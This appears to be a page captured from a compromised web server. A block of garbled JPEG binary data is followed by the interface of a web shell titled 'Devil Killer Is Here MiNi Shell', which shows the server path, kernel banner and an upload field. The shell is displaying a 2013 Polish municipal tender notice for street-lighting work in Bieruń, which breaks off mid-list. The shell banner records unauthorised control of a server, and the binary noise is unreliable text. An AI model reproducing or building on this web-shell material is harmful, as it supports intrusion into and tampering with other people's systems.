JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130621/239390-N-2013.html

<p class="kh_header"><b>Bieruń: Modernizacja oświetlenia osiedla przy ul. Węglowej w Bieruniu - etap III,
część 3 osiedle Węglowe -  kierunek Wschód obwód 4</b><br>
<b>Numer ogłoszenia: 239390 - 2013; data zamieszczenia: 21.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oświetlenia osiedla przy ul. Węglowej w Bieruniu - etap III,
część 3 osiedle Węglowe -  kierunek Wschód obwód 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A)	Inwestycja realizowana jest w ramach zadania pn.: Modernizacja oświetlenia osiedla przy ulicy Węglowej. Inwestycja ta została podzielona ze względów finansowych na etapy. Przedmiotem niniejszego zamówienia jest realizacja etapu III.

B)	Zakres robót etapu III  obejmuje:
           1. Demontaż starych słupów oświetleniowych wraz z wysięgnikami i oprawami.           
           2. Montaż nowych słupów oświetleniowych typu SAL  na fundamentach betonowych 
               wraz z oprawami typu LED.
           3. Wykonanie przewiertów dla kabla nN pod drogami, rura SRS 110.
           4. Ułożenie kabla YAKY 4x35 mm2 zasilającego słupy oświetleniowe w rurach 
               ochronnych DVR 75.
           5. Ułożenie bednarki ocynkowanej uziemiającej FeZn 25x4 mm2 .
           6. Montaż głowicy kablowej nN i wprowadzenie kabla do rozdzielni oświetleniowej.
           7. Montaż tabliczek bezpiecznikowych słupowych TB-1 lub TB-2.
           8. Wykonanie dodatkowych prac towarzyszących w/w zakresowi robót zgodnie 
               z przedmiarem.
           9. Badania i pomiary po montażowe niezbędne dla włączenia instalacji do ruchu.
         10. Ewentualne uaktualnienie tymczasowej organizacji ruchu i wykonanie oznakowania
               na czas prowadzenia robót.
         11. Sporządzenie planu BIOZ i harmonogramu robót budowlano - elektrycznych.
         12. Sporządzenie dokumentacji powykonawczej odbiorowej zgodnie z wytycznymi 
               Inwestora i Przedsiębiorstwa Energetycznego.
C)	Szczegółowy opis i zakres przedmiotu zamówienia zawarty jest w następujących opracowaniach, stanowiących załączniki do SIWZ: 
1.	Projekt Budowlano-Wykonawczy Rozbudowy oświetlenia osiedla przy ul. Węglowej w Bieruniu w ramach zadania pod nazwą Modernizacja oświetlenia osiedla przy ulicy Węglowej w Bieruniu.
2.	Projekt organizacji ruchu drogowego na czas robót związanych z budową oświetlenia i kabla energetycznego na ul. Węglowej w Bieruniu.
3.	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (STWiORB).
4.	Przedmiar robót (część 3 osiedle Węglowe - kierunek wschód obwód 4) branża elektroenergetyczna.
D)	Wykonawca w ramach realizacji przedmiotu zamówienia i w ramach zaoferowanej ceny: 
1.	Zastosuje do realizacji przedmiotu zamówienia tylko nowe materiały, urządzenia 
oraz wyposażenie.
2.	Opracuje plan bezpieczeństwa i ochrony zdrowia (BIOZ), i przedstawi go zamawiającemu 
	do uzgodnienia.
3.	Zorganizuje własne zaplecze na potrzeby budowy w miejscu uzgodnionym z zamawiającym.
4.	Wykona zasilanie placu budowy w energię elektryczną i wodę  oraz pokryje koszty zużycia 
wody i energii elektrycznej.
5.	Dokona ewentualnych (uzgodnionych z dostawcami) zamknięć i wyłączeń czasowych mediów.
6.	Zleci nadzory specjalistyczne właścicielom lub gestorom urządzeń uzbrojenia terenu, 
w pobliżu których będą prowadzone roboty.
7.	Zapewni bieżącą obsługę geodezyjną. 
8.	Wykona inwentaryzację terenu (przed rozpoczęciem robót) .

       9.Przeprowadzi wszelkie niezbędne: próby, badania, odbiory przewidziane przepisami, w tym 
    przede wszystkim wynikających ze STWiORB, oraz konieczne a nie ujęte w przedmiarze 
    robót.
          10. Weźmie udział w przekazaniu wykonanych robót wraz z wymaganą dokumentacją 
	poszczególnym gestorom urządzeń uzbrojenia terenu na warunkach określonych przez nich 
		w trakcie uzgadniania dokumentacji.
          11. Zapewnieni warunki bezpieczeństwa na osiedlu - placu budowy w okresie wykonywania prac 
                poprzez prawidłowe oznakowanie miejsca robót i zajęcia pasa drogowego, oraz bieżące   
               utrzymanie i czyszczenie dróg, z których będzie korzystał wykonawca w czasie realizacji 
               zadania. 
         12. Prawidłowo oznakuje oraz zabezpieczy dojścia i dojazdy do poszczególnych nieruchomości 
		w okresie prowadzenia robót.
   13. Będzie informować na bieżąco właścicieli i użytkowników posesji o wszelkich utrudnieniach 
		oraz przerwach w dostawie mediów, spowodowanych realizacją przedmiotu zamówienia.
         14. Zabezpieczy możliwość dojazdu pojazdów uprzywilejowanych (straż, pogotowie itp.).
   15.  Naprawi wszelkie szkody wyrządzone osobom trzecim w toku realizacji robót.
         16. W przypadku uszkodzenia urządzeń - poniesie koszty usunięcia awarii oraz koszty 
poniesionych strat eksploatacyjnych.
         17. Przywróci teren zajęty w czasie realizacji zadania do stanu pierwotnego wraz z uzyskaniem 
oświadczeń właścicieli przyległych terenów o braku zastrzeżeń do granic i stanu terenu po wykonaniu robót.
        18. Wykona i przekaże dokumentację fotograficzną zakresu robót - wersja elektroniczna z datami
wykonania zdjęć obiektów sąsiadujących z realizowaną inwestycją, którą należy wykonać przed przystąpieniem do robót, w trakcie oraz po zakończeniu robót (bezwzględnie elementy ulegające zakryciu).
       19. Wykona tymczasową organizację ruchu (zezwolenie na zajęcie pasa drogowego na czas 		 prowadzenia robót, dostawa, montaż i demontaż oznakowania);
       20. Wykona dokumentację powykonawczą wg § 10 ust. 4 umowy w 4 egz. (1 egz. dokumentacji 
	 powykonawczej musi zawierać oryginały wszystkich dokumentów).                                                                                                                                
E)	Jeżeli w dokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót oraz SIWZ
określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i art.7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego lub wyższego poziomu jakościowego, technologicznego i estetycznego, określonych w SIWZ i STWOiRB.
Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem
budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty,
certyfikaty i aprobaty techniczne. 
F)	Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów w rozumieniu ustawy pzp oraz stosowania wymagań określonych w art.29 ust.4 
ustawy pzp.
Zamawiający nie dopuszcza składania ofert częściowych, wariantowych.
G)	Odpowiedzialność wykonawcy z tytułu gwarancji za wady w odniesieniu do całego przedmiotu umowy wynosi 60 miesięcy, licząc od daty odbioru przedmiotu umowy.
H)	 Nazwy i kody według słownika CPV:
        45315100-9   Instalacyjne roboty elektryczne,
        45311000-0   Roboty w zakresie przewodów instalacji elektrycznych oraz opraw 
                              elektrycznych,
        45311100-1   Roboty w zakresie przewodów instalacji elektrycznej,
        45311200-2   Roboty w zakresie opraw elektrycznych,
        45312311-0   Instalowanie oświetlenia,
        45314200-3   Instalowanie infrastruktury kablowej,
        45314300-4   Kładzenie kabli,
        45315300-1   Instalowanie linii energetycznych,
              45316100-6   Instalowanie zewnętrznego sprzętu oświetleniowego,
              45317000-2   Inne instalacje elektryczne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.51.00-9, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2, 45.31.23.11-0, 45.31.42.00-3, 45.31.43.00-4, 45.31.53.00-1, 45.31.61.00-6, 45.31.70.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości   17 000,00 zł ( słownie: siedemnaścietysięcyzłotych) musi być wniesione                     w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP.271. 22. 2013 Przetarg nieograniczony na wybór wykonawcy zamówienia Modernizacja oświetlenia osiedla przy ul. Węglowej w Bieruniu - etap III, część 3 osiedle Węglowe   -  kierunek Wschód obwód 4.
Termin - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium, wpłaconego przelewem, na rachunku zamawiającego nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu              ( I piętro, pokój nr 8, segment B) nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert. 
Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert.
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się                               o udzielenie nin. zamówienia, zaleca się  wskazać informacyjnie wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego.
3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają wiedzę i doświadczenie: 
     Wykonali w sposób należyty, zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie  
      ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności  
      jest krótszy - to w tym okresie roboty budowlane w zakresie budowy lub przebudowy oświetlenia   
      zewnętrznego o wartości min. 700 000,00 zł brutto, w tym jedną robotę o wartości min.300 000,00 zł  
      brutto.
     Zamawiający uzna za spełnienie warunku również wykonanie jednej  roboty w ww. zakresie                          
     o wartości  min. 700 000,00 zł brutto.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp),
     - wykazu wykonanych robót w zakresie budowy lub przebudowy oświetlenia zewnętrznego                             
       o wartości min. 700 000,00 zł brutto, w tym jednej roboty o wartości min.300 000,00 zł brutto,
   z podaniem  ich rodzaju, daty  i miejsca  wykonania oraz załączeniem dowodów potwierdzających, 
   że roboty te zostały wykonane należycie i określających, czy roboty te zostały wykonane zgodnie                   
   z zasadami sztuki budowlanej i prawidłowo ukończone . 
Dowodami są:
1)	poświadczenie,
2)	inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie wykazać poświadczenia, o którym mowa wyżej.
W przypadku gdy zamawiający jest podmiotem, na rzecz którego zostały wykonane roboty wskazane w wykazie robót budowlanych wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.
W postępowaniach wszczynanych w okresie do 20.02.2014 r., wykonawca w miejsce poświadczeń może  przedkładać dokumenty  potwierdzające wykonanie robót zgodnie z zasadami sztuki budowlanej  i ich prawidłowe ukończenie ( np. referencje, protokoły odbioru końcowego robót). 
Przez wykonali należy rozumieć, że roboty  zostały zakończone i odebrane protokołami 	 końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,
a jeżeli okres jest krótszy - w tym okresie. 
    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku    
    nastąpi łącznie tzn. należy wykazać, że warunek wykonania budowy lub przebudowy 
    oświetlenia zewnętrznego o wartości min. 700 000,00 zł brutto spełnia przynajmniej jeden                             
    z wykonawców lub spełniają go łącznie , tzn. jeden wykonawca wykonał budowę lub przebudowę                 
    o wartości min. 300 000,00 zł brutto, a łącznie wykonali roboty w w/w zakresie  wartości                            
    min.700 000,00 zł brutto.
    W przypadku, gdy wykonawca polega na zasobach innych podmiotów przy wykazaniu spełnienia 
    warunku  wiedzy i doświadczenia należy wykazać udział tych podmiotów w wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie
przedłożonego  przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
    Dysponują osobami posiadającymi uprawnienia bez ograniczeń w zakresie kierowania robotami 
    w zakresie sieci elektrycznych, które będą  uczestniczyć w wykonaniu zamówienia. 
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
    przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
-	wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za  kierowanie robotami w zakresie sieci elektrycznych, wraz  z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że 
    warunek spełnia jeden z tych wykonawców lub wykonawcy wspólnie ubiegający się o udzielenie 
    zamówienia spełniają go łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
    przedłożonego przez wykonawcę: 
    - oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia jeden z tych wykonawców lub wykonawcy wspólnie ubiegający się o udzielenie 
     zamówienia spełniają go łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
